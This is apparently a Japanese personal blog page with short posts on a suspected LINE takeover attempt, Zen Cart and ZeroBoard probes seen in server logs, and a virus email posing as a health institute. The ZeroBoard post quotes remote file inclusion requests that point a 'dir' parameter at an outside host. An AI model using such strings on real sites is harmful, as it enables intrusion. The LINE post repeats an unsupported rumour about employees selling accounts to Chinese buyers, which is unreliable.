LINEアカウント乗っ取られそうになった

Close article

LINE気をつけたほうが良いっぽい。

今朝、妙な噂を見かけたから念のため、LINEの
「その他→設定→アカウント→他端末ログイン許可」
のところのチェックを外したんやけど、

さっき、こんな通知が…。
LINEアカウント

「PCでLINEにログインできませんでした。
 ログインを試みた端末:XXX-VPNXX (一部自粛)
 心当りがない場合はアカウント情報を
 変更してください」
って書いてある。

ちなみにパスワードは最近変更してて、
他で使い回してないユニークなやつ、
ランダムな英数字で十数文字。

しかもPINコードも設定してある。

いったい、何がどうなってんや…。
みんなも早めに、上記の設定しといたほうが安心。
しばらくPCからLINEするのは、控えようと思う。

LINEの社員が中国人に日本人アカウントを
売ってるって噂もあるけど、ほんまかもしれん。

LINE社は「中国支社が無いので、ありえない。
他のサービスから漏洩したログイン情報で、
乗っ取りが発生してる」
って否定してるけど、それはない。
他の全サービスとパスワード違うし。

おそろしあ。

●関連リンク LINE詐欺犯「中国のLINE社員からアカウント情報を買い取った」

Comment : 0

Zen Cartに脆弱性?

Close article

 ぽけーっとサーバのアクセスログとか見てると
見慣れない(気がする)ログが↓

/ZenCart/includes/general.js 404
/admin/includes/general.js 404
/cart/includes/general.js 404
/includes/general.js 404
/zen/includes/general.js 404
/zencart/includes/general.js 404

Zen Cart(ゼン・カート)??
なんやコレと思って調べてみると、なにやら
オープンソースなECサイト構築システムぽい。
日本語公式サイトの、スレとか見てみると、
過去にも、ポクポク脆弱性の問題が見つかってる
って言うても、この手のもんではよくある話。
ECサイトやったら勿論のこと、簡単な掲示板とかでも
こういうのの使ってるときは、常に最新バージョンには
気ィつけんと、ほんま怖いわ。
日本語公式サイトと、スレ

Comment : 0

ZeroBoardの脆弱性?

Close article

サーバのログ見てたら、こんな感じのログが

//bbs/skin/zero_vote/login.php?dir=http:// … net.ro/key.txt?…
//zboard/skin/zero_vote/login.php?dir=http … net.ro/key.txt?…

気になるのでちょっとググってみた。
ふむふむ。「ZeroBoard」なる韓国産のPHP掲示板らしい。
調べてみると、どうやら2005年くらいに脆弱性が発見されてるけど、
register_globalsをoffにすれば回避できたとか。
(きっとその後のver.upにて対策してるやろうけど。)
その後も、2006年にもXSSによる攻撃があった模様。
「dir」のパラメータでゴニョゴニョしてるあたりは、2005年の時の
攻撃に似てる気がするなんとなくやけど。
日本でも使われとるんかな。でも本家サイトがハングルで読まれへん。
サイト右上の「select language」がほぼ意味を成してない。
yahoo web翻訳にかけてみたけど、たとえば更新履歴のページは
「ポムムンでなが葱であるアップロドウィしたアクション追加 」
全く意味が理解できない。。。 ナイスyahoo翻訳
お、なんか2009年2月にもセキュリティホールが発見されとる。
被害verは1.1.5。最新verは現時点で1.2.3やから、とりあえず
ver upしたらいけるんかな?(未確認)
とにかくZeroBoard使ってる方はご注意。

Comment : 0

「豚インフルに注意!」に注意(ウイルスメール)

Close article

「豚インフルに注意!」なんていうタイトルのメールが届き、
でもそのメールにはウイルスが添付されていて、開くと
PCがウイルスに感染してしまうという。。。
また、送信元(from)は国立感染症研究所になっている
っちゅうから、また悪質や。
ほんま、気ィつけなアカンなぁ。
ヒドい話やわ。
国立感染症研究所記事(2009/04/28)
–「国立感染症研究所」を詐称したブタインフルエンザ関連メールにご注意ください–

Comment : 0
↑ return to top of page
blog comments powered by Disqus